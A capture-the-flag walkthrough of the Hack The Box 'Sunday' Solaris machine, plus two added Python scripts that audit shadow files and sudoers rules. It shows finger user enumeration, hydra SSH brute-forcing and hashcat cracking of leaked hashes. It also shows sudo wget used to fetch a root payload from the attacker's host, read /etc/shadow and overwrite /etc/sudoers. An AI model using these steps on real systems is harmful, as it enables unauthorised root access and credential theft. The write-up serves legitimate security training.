Sunday
This box was really hard to scan and unstable; it lost around 25% of ping packets. I needed several scans to find all ports.
Ports scan
nmap
root@kali:~/HTB/Machines/Sunday# nmap -A -T4 -v 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-27 20:53 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:53
Completed NSE at 20:53, 0.00s elapsed
Initiating NSE at 20:53
Completed NSE at 20:53, 0.00s elapsed
Initiating NSE at 20:53
Completed NSE at 20:53, 0.00s elapsed
Initiating Ping Scan at 20:53
Scanning 10.10.10.76 [4 ports]
Completed Ping Scan at 20:53, 0.07s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 20:53
Scanning sunday.htb (10.10.10.76) [1000 ports]
Discovered open port 111/tcp on 10.10.10.76
Increasing send delay for 10.10.10.76 from 0 to 5 due to 34 out of 84 dropped probes since last increase.
Discovered open port 79/tcp on 10.10.10.76
Increasing send delay for 10.10.10.76 from 5 to 10 due to 18 out of 44 dropped probes since last increase.
Warning: 10.10.10.76 giving up on port because retransmission cap hit (6).
Completed SYN Stealth Scan at 20:53, 29.55s elapsed (1000 total ports)
Initiating Service scan at 20:53
Scanning 2 services on sunday.htb (10.10.10.76)
Completed Service scan at 20:54, 6.20s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against sunday.htb (10.10.10.76)
Retrying OS detection (try #2) against sunday.htb (10.10.10.76)
Retrying OS detection (try #3) against sunday.htb (10.10.10.76)
Retrying OS detection (try #4) against sunday.htb (10.10.10.76)
Retrying OS detection (try #5) against sunday.htb (10.10.10.76)
Initiating Traceroute at 20:54
Completed Traceroute at 20:54, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:54
Completed Parallel DNS resolution of 2 hosts. at 20:54, 0.19s elapsed
NSE: Script scanning 10.10.10.76.
Initiating NSE at 20:54
Completed NSE at 20:54, 10.06s elapsed
Initiating NSE at 20:54
Completed NSE at 20:54, 0.09s elapsed
Initiating NSE at 20:54
Completed NSE at 20:54, 0.00s elapsed
Nmap scan report for sunday.htb (10.10.10.76)
Host is up (0.045s latency).
Not shown: 838 closed ports, 160 filtered ports
PORT    STATE SERVICE VERSION
79/tcp  open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open  rpcbind 2-4 (RPC #100000)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/27%OT=79%CT=1%CU=37827%PV=Y%DS=2%DC=T%G=Y%TM=5DDF28
OS:D2%P=x86_64-pc-linux-gnu)SEQ(SP=9B%GCD=1%ISR=A4%TI=I%CI=I%II=I%SS=S%TS=7
OS:)SEQ(CI=I)OPS(O1=NNT11M54DNW0NNS%O2=NNT11M54DNW0NNS%O3=NNT11M54DNW0%O4=N
OS:NT11M54DNW0NNS%O5=NNT11M54DNW0NNS%O6=NNT11M54DNNS)WIN(W1=C265%W2=C265%W3
OS:=C1CC%W4=C068%W5=C068%W6=C0B7)ECN(R=Y%DF=Y%T=3C%W=C421%O=M54DNW0NNS%CC=Y
OS:%Q=)T1(R=Y%DF=Y%T=3C%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=Y%T=FF%I
OS:PL=70%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=FF%CD=S)

Network Distance: 2 hops
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   44.30 ms 10.10.14.1
2   44.28 ms sunday.htb (10.10.10.76)

NSE: Script Post-scanning.
Initiating NSE at 20:54
Completed NSE at 20:54, 0.00s elapsed
Initiating NSE at 20:54
Completed NSE at 20:54, 0.00s elapsed
Initiating NSE at 20:54
Completed NSE at 20:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.14 seconds
           Raw packets sent: 2630 (122.016KB) | Rcvd: 920 (39.194KB)
Scan all ports to find the ones the first scan missed.
root@kali:~/HTB/Machines/Sunday# nmap -p- 10.10.10.76 --max-retries 1
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-29 21:54 EST
Warning: 10.10.10.76 giving up on port because retransmission cap hit (1).
Nmap scan report for sunday.htb (10.10.10.76)
Host is up (0.045s latency).
Not shown: 37958 closed ports, 27572 filtered ports
PORT      STATE SERVICE
79/tcp    open  finger
111/tcp   open  rpcbind
22022/tcp open  unknown
49323/tcp open  unknown
64513/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1204.72 seconds
We find more ports :)
root@kali:~/HTB/Machines/Sunday# nmap -sC -sV -p 79,111,22022 10.10.10.76
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-29 22:18 EST
Nmap scan report for sunday.htb (10.10.10.76)
Host is up (0.045s latency).

PORT      STATE SERVICE VERSION
79/tcp    open  finger  Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp   open  rpcbind 2-4 (RPC #100000)
22022/tcp open  ssh     SunSSH 1.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_  1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.99 seconds
Finger enumeration
Installation
root@kali:~/HTB/Utils# wget -q http://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz
root@kali:~/HTB/Utils# tar xfz finger-user-enum-1.0.tar.gz
root@kali:~/HTB/Utils# cd finger-user-enum-1.0
root@kali:~/HTB/Utils/finger-user-enum-1.0# perl -MCPAN -e shell

cpan shell -- CPAN exploration and modules installation (v2.22)
Enter 'h' for help.

cpan[1]> install Getopt::Std
Reading '/root/.cpan/Metadata'
  Database was generated on Sun, 17 Nov 2019 20:17:03 GMT
Fetching with LWP:
http://www.cpan.org/authors/01mailrc.txt.gz
Reading '/root/.cpan/sources/authors/01mailrc.txt.gz'
............................................................................DONE
Fetching with LWP:
http://www.cpan.org/modules/02packages.details.txt.gz
Reading '/root/.cpan/sources/modules/02packages.details.txt.gz'
  Database was generated on Thu, 28 Nov 2019 01:17:03 GMT
.............
  New CPAN.pm version (v2.27) available.
  [Currently running version is v2.22]
  You might want to try
    install CPAN
    reload cpan
  to both upgrade CPAN.pm and run the new version without leaving
  the current session.

...............................................................DONE
Fetching with LWP:
http://www.cpan.org/modules/03modlist.data.gz
Reading '/root/.cpan/sources/modules/03modlist.data.gz'
DONE
Writing /root/.cpan/Metadata
Getopt::Std is up to date (1.12).

cpan[2]> quit
Lockfile removed.
We copy the Perl script to our work directory.
root@kali:~/HTB/Machines/Sunday# cp ../../Utils/finger-user-enum-1.0/finger-user-enum.pl ./
User enumeration
root@kali:~/HTB/Machines/Sunday# ./finger-user-enum.pl -m 50 -s 60 -U /usr/share/seclists/Usernames/Names/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 50
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10163
Target TCP port .......... 79
Query timeout ............ 60 secs
Relay Server ............. Not used

######## Scan started at Thu Nov 28 00:13:02 2019 #########
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@10.10.10.76: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..miof ???..mela ???..
sammy@10.10.10.76: sammy pts/2 <Apr 24, 2018> 10.10.14.4 ..
sunny@10.10.10.76: sunny pts/2 <Apr 24, 2018> 10.10.14.4 ..
sys@10.10.10.76: sys ??? < . . . . >..
zsa zsa@10.10.10.76: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Thu Nov 28 00:16:29 2019 #########
14 results.

10163 queries in 207 seconds (49.1 queries / sec)
Brute force against ssh port
I really don't like brute force or lucky-guess techniques. First I tried hydra against user sammy, with no luck, but on the second attempt sunny worked, even if it was easy to "guess".
root@kali:~/HTB/Machines/Sunday# hydra -f -V -l sunny -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt -o credentials.txt -s 22022 10.10.10.76 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-11-29 22:36:55
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9437 login tries (l:1/p:9437), ~590 tries per task
[DATA] attacking ssh://10.10.10.76:22022/
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "123456" - 1 of 9437 [child 0] (0/0)
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "12345" - 2 of 9437 [child 1] (0/0)
...
[ATTEMPT] target 10.10.10.76 - login "sunny" - pass "kristy" - 2383 of 9448 [child 14] (0/11)
[22022][ssh] host: 10.10.10.76   login: sunny   password: sunday
[STATUS] attack finished for 10.10.10.76 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-11-29 22:51:00
Login with user sunny and lateral escalation
root@kali:~/HTB/Machines/Sunday# ssh -p 22022 sunny@10.10.10.76
Unable to negotiate with 10.10.10.76 port 22022: no matching key exchange method found. Their offer: gss-group1-sha1-toWM5Slw5Ew8Mqkay+al2g==,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
I didn't expect this, but a quick search gave the solution.
root@kali:~/HTB/Machines/Sunday# ssh -p 22022 -okexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Sat Nov 30 03:51:01 2019 from 10.10.14.34
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
The user flag is not available for user sunny :(
Sudo user sunny
sunny@sunday:~$ sudo -l
User sunny may run the following commands on this host:
(root) NOPASSWD: /root/troll
But the execution of the troll file is not very useful (at least for now).
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)
Shadow backup file
After a while, we find an interesting world-readable file in the folder /backup.
sunny@sunday:/backup$ ls -ltr
total 2
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
-r-x--x--x 1 root root  53 2018-04-24 10:35 agent22.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
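As an added example (not part of the original write-up), the following Python audits a leaked shadow file of this shape from the defender's side: it classifies each entry, flags the world-readable mode shown by ls -ltr, and reproduces the ETA arithmetic hashcat prints in the cracking run below (rockyou.txt's 14344384 words at 469 H/s). The sample lines are copied from shadow.backup; the scheme table and default round counts are assumed from crypt(3) conventions.

```python
"""Classify the entries of a leaked Solaris shadow file and size up the exposure.
Added example for this write-up, not part of the original page.  Format knowledge
assumed here: "NP" means no password is set, "*LK*" a locked account, and "$5$"
a sha256crypt hash that defaults to 5000 rounds when no "rounds=" prefix is
present (hashcat's "Iteration:4992-5000" status line reflects those rounds)."""
import re

# Constructed sample: a subset of the lines shown from /backup/shadow.backup.
SHADOW_BACKUP = """\
mysql:NP:::::::
svctag:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
"""

SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
DEFAULT_ROUNDS = {"md5crypt": 1000, "sha256crypt": 5000, "sha512crypt": 5000}
# $id$[rounds=N$]salt$digest
HASH_RE = re.compile(
    r"^\$(?P<id>[^$]+)\$(?:rounds=(?P<rounds>\d+)\$)?(?P<salt>[^$]+)\$(?P<digest>\S+)$"
)


def classify(password_field):
    """Map the second shadow field to an account state plus hash metadata."""
    if password_field == "NP":
        return {"state": "no-password"}
    if password_field.startswith("*LK*"):
        return {"state": "locked"}
    m = HASH_RE.match(password_field)
    if not m:
        return {"state": "unknown"}
    scheme = SCHEMES.get(m["id"], "unknown")
    rounds = int(m["rounds"]) if m["rounds"] else DEFAULT_ROUNDS.get(scheme)
    return {"state": "hashed", "scheme": scheme, "rounds": rounds, "salt": m["salt"]}


def parse_shadow(text):
    """One dict per shadow line; blank and comment lines are skipped."""
    entries = []
    for line in text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) < 2 or not fields[0]:
            continue
        entries.append({"user": fields[0], **classify(fields[1])})
    return entries


def exposed_accounts(entries):
    """Users whose password can be guessed offline once this file leaks."""
    return [e["user"] for e in entries if e["state"] == "hashed"]


def world_readable(ls_mode):
    """True for an ls -l mode string such as -rw-r--r-- (the 'other' read bit)."""
    return len(ls_mode) == 10 and ls_mode[7] == "r"


def dictionary_exhaust_time(wordlist_size, hashes_per_second):
    """Whole (hours, minutes) needed to try every word, like hashcat's ETA."""
    seconds = wordlist_size // hashes_per_second
    return seconds // 3600, (seconds % 3600) // 60


if __name__ == "__main__":
    entries = parse_shadow(SHADOW_BACKUP)
    print("mode -rw-r--r-- is world readable:", world_readable("-rw-r--r--"))
    for e in entries:
        print(f"{e['user']:10} {e['state']:12} {e.get('scheme', '')} {e.get('rounds') or ''}")
    print("exposed accounts:", exposed_accounts(entries))
    # rockyou.txt has 14344384 words; the write-up's CPU ran at 469 H/s
    print("rockyou exhausted in %dh %dm" % dictionary_exhaust_time(14344384, 469))
```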
Hashcat to find sammy password
Again, I don't like brute force, and I don't have a cracking machine available.
root@kali:~/HTB/Machines/Sunday# hashcat --force -m 7400 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-8550U CPU @ 1.80GHz, 2048/5878 MB allocatable, 8MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=8 -D KERN_TYPE=7400 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Thu Nov 28 01:34:21 2019 (4 secs)
Time.Estimated...: Thu Nov 28 10:04:01 2019 (8 hours, 29 mins)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      469 H/s (11.44ms) @ Accel:64 Loops:64 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 1536/14344384 (0.01%)
Rejected.........: 0/1536 (0.00%)
Restore.Point....: 1536/14344384 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2560-2624
Candidates.#1....: clover -> lovers1

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Thu Nov 28 01:34:21 2019 (8 mins, 25 secs)
Time.Estimated...: Thu Nov 28 13:02:05 2019 (11 hours, 19 mins)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      348 H/s (18.94ms) @ Accel:64 Loops:64 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 175104/14344384 (1.22%)
Rejected.........: 0/175104 (0.00%)
Restore.Point....: 175104/14344384 (1.22%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2816-2880
Candidates.#1....: ROSAPASTEL -> 930330

$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!

Session..........: hashcat
Status...........: Cracked
Hash.Type........: sha256crypt $5$, SHA256 (Unix)
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Thu Nov 28 01:34:21 2019 (9 mins, 49 secs)
Time.Estimated...: Thu Nov 28 01:44:10 2019 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:      346 H/s (19.36ms) @ Accel:64 Loops:64 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 203776/14344384 (1.42%)
Rejected.........: 0/203776 (0.00%)
Restore.Point....: 203264/14344384 (1.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidates.#1....: daddyzgurl -> chrystelle

Started: Thu Nov 28 01:34:19 2019
Stopped: Thu Nov 28 01:44:11 2019
We find the password:
root@kali:~/HTB/Machines/Sunday# hashcat --force -m 7400 hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --show
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
User Flag
root@kali:~/HTB/Machines/Sunday# ssh -p 22022 -okexAlgorithms=+diffie-hellman-group1-sha1 sammy@10.10.10.76
Password:
Last login: Tue Apr 24 12:57:03 2018 from 10.10.14.4
Sun Microsystems Inc.   SunOS 5.11      snv_111b        November 2008
sammy@sunday:~$ cat Desktop/user.txt
<USER_FLAG>
User escalation
Sudo user sammy
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
With wget, we should be able to write files as root.
Overwrite /root/troll
From the sammy user we can overwrite the /root/troll file, then execute it as root from the sunny user.
Open listener
root@kali:~/HTB/Machines/Sunday# vi troll
root@kali:~/HTB/Machines/Sunday# cat troll
bash
root@kali:~/HTB/Machines/Sunday# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Download the new troll file
sammy@sunday:~$ sudo wget http://10.10.14.34/troll -O /root/troll
--05:25:35--  http://10.10.14.34/troll
           => `/root/troll'
Connecting to 10.10.14.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5 [application/octet-stream]

100%[====================================>] 5             --.--K/s

05:25:35 (1000.58 KB/s) - `/root/troll' saved [5/5]
Execute /root/troll
sunny@sunday:/backup$ sudo /root/troll
testing
uid=0(root) gid=0(root)
But we still get the "testing" output of the original bash script :(
Execute /root/troll on loop
After various unsuccessful attempts, I found a suspicious sleeping process. I guessed that something was overwriting the troll file every 5 seconds.
sammy@sunday:~$ ps -ef | grep sleep
root 7316 517 0 05:37:06 ? 0:00 /usr/gnu/bin/sleep 5
So, if we execute the troll file every second, we should win the "race".
sunny@sunday:/backup$ while :
> do
> echo "--------------------------------------"
> sudo /root/troll
> sleep 1
> done
--------------------------------------
testing
uid=0(root) gid=0(root)
--------------------------------------
testing
uid=0(root) gid=0(root)
...
Download the troll file
sammy@sunday:~$ sudo wget http://10.10.14.34/troll -O /root/troll
--05:31:47--  http://10.10.14.34/troll
           => `/root/troll'
Connecting to 10.10.14.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5 [application/octet-stream]

100%[====================================>] 5             --.--K/s

05:31:47 (996.49 KB/s) - `/root/troll' saved [5/5]
A root shell opens in the loop
...
testing
uid=0(root) gid=0(root)
--------------------------------------
testing
uid=0(root) gid=0(root)
--------------------------------------
root@sunday:/backup# whoami
root
User escalation (alternative way)
Read privileged files
The -i option of wget reads the URLs to download from an input file. We can use this to read privileged files, because wget echoes every line it cannot parse as a URL back in its error messages.
sammy@sunday:~$ sudo wget -i /root/troll
/root/troll: Invalid URL #!/usr/bin/bash: Unsupported scheme
/root/troll: Invalid URL /usr/bin/echo "testing": Unsupported scheme
/root/troll: Invalid URL /usr/bin/id: Unsupported scheme
No URLs found in /root/troll.
With a little awk, we can read files cleanly.
sammy@sunday:~$ sudo wget -i /root/troll 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}'
#!/usr/bin/bash
/usr/bin/echo "testing"
/usr/bin/id
This trick works as long as the lines of the file do not contain a URL or a scheme that wget can interpret. We can read the root flag with the following command.
sammy@sunday:~$ sudo wget -i /root/root.txt 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}'
<ROOT_FLAG>
But we don't own the system.
Read /etc/sudoers
In Solaris the sudoers file is readable by the root user.
sammy@sunday:~$ sudo wget -i /etc/sudoers 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}'
The script fails because awk tries to interpret %users as a printf format string (the file content is passed to printf as the format, not as an argument).
...
#Samples
#awk: (FILENAME=- FNR=21) fatal: not enough arguments to satisfy format string
	`%users ALL=/sbin/mount /cdrom,/sbin/umount /cdrom: Unsupported schemeted schemeorted scheme'
	 ^ ran out for this one
But we do not need the commented lines, so we ignore lines whose 4th field begins with #.
sammy@sunday:~$ sudo wget -i /etc/sudoers 2>&1 | awk '{ if (substr($4,1,1)!="#") { for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}}'
rootALL=(ALL)ALL
sammyALL=(root)NOPASSWD:/usr/bin/wget
sunnyALL=(root)NOPASSWD:/root/troll
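The three recovered rules describe the whole escalation chain on this box, so here is an added example (not from the original write-up) of a small sudoers audit in Python that would have flagged it: a NOPASSWD rule for a file-writing tool such as wget run as root, plus the cross-rule consequence that its holder can replace the command file behind every other root rule, and /etc/sudoers itself. The sample rules are the ones read above; the FILE_WRITE_TOOLS watch-list beyond wget is an assumption.

```python
"""Audit sudoers user specifications for the escalation chain seen on this box.
Added example for this write-up, not part of the original page or of sudo.
Assumed model: a NOPASSWD rule for a tool that can write arbitrary files as root
(wget -O) lets that user replace the command file behind every other root rule
and /etc/sudoers itself, so every sudo user on the host effectively inherits root."""
import re

# Constructed sample: the three rules recovered from /etc/sudoers in the write-up.
SUDOERS = """\
root    ALL=(ALL) ALL
sammy   ALL=(root) NOPASSWD: /usr/bin/wget
sunny   ALL=(root) NOPASSWD: /root/troll
"""

# Programs that can read or write arbitrary files when run as root.  wget is the
# one abused on this box; the rest is an assumed, deliberately short watch-list.
FILE_WRITE_TOOLS = {"wget", "curl", "cp", "tee", "dd", "mv"}

# user  host=(runas) [TAG: ...] command[, command]
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_rules(text):
    """Return user-spec rules as dicts; comments, Defaults and aliases are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults") or "_Alias" in line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        # "(root)" or "(ALL)"; an omitted runas list means root; "(u:g)" keeps the user
        runas = ((m["runas"] or "root").split(":")[0].strip()) or "root"
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        rules.append({
            "user": m["user"],
            "runas": runas,
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in m["cmds"].split(",") if c.strip()],
        })
    return rules


def audit(rules):
    """Return findings plus the users who can write arbitrary files as root."""
    findings, file_writers = [], []
    for r in rules:
        as_root = r["runas"] in ("root", "ALL")
        for cmd in r["cmds"]:
            prog = cmd.split()[0]
            base = prog.rsplit("/", 1)[-1]
            if cmd == "ALL" and r["user"] != "root":
                findings.append(f"{r['user']}: unrestricted ALL as {r['runas']}")
            elif as_root and r["nopasswd"] and base in FILE_WRITE_TOOLS:
                findings.append(f"{r['user']}: NOPASSWD {prog} as root can write any "
                                f"file, including /etc/sudoers")
                file_writers.append(r["user"])
    # Cross-rule check: a file writer can replace the command file of every other
    # rule that runs as root, which is how sammy's wget fed sunny's /root/troll.
    for w in file_writers:
        for r in rules:
            if r["user"] == w or r["runas"] not in ("root", "ALL"):
                continue
            for cmd in r["cmds"]:
                if cmd.startswith("/"):
                    findings.append(f"{w} can overwrite {cmd.split()[0]}, "
                                    f"which {r['user']} runs as root")
    return {"findings": findings, "file_writers": file_writers}


if __name__ == "__main__":
    for finding in audit(parse_rules(SUDOERS))["findings"]:
        print("[!]", finding)
```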
Create a modified copy of /etc/sudoers
root@kali:~/HTB/Machines/Sunday# vi sudoers
And we give sammy full access to sudo.
root@kali:~/HTB/Machines/Sunday# cat sudoers
root ALL=(ALL) ALL
sammy ALL=(root) NOPASSWD: ALL
#sammy ALL=(root) NOPASSWD: /usr/bin/wget
sunny ALL=(root) NOPASSWD: /root/troll
Upload the new /etc/sudoers
sammy@sunday:~$ sudo wget http://10.10.14.34/sudoers -O /etc/sudoers
--05:57:26--  http://10.10.14.34/sudoers
           => `/etc/sudoers'
Connecting to 10.10.14.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 131 [application/octet-stream]

100%[====================================>] 131           --.--K/s

06:36:24 (30.70 MB/s) - `/etc/passwd' saved [131/131]
sudo to user root
sammy@sunday:~$ sudo -i
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
root@sunday:~# whoami
root
User escalation (harder alternative way)
Extract /etc/shadow
We can extract the hash of root.
sammy@sunday:~$ sudo wget -i /etc/shadow 2>&1 | awk '{ for (i=4;i<NF-1;i++) {if (i!=(NF-2)) printf $i" "; else printf substr($i,1,length($i)-1)"\n"; }}'
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
dladm:*LK*:::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
zfssnap:NP:::::::
xvm:*LK*:6445::::::
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
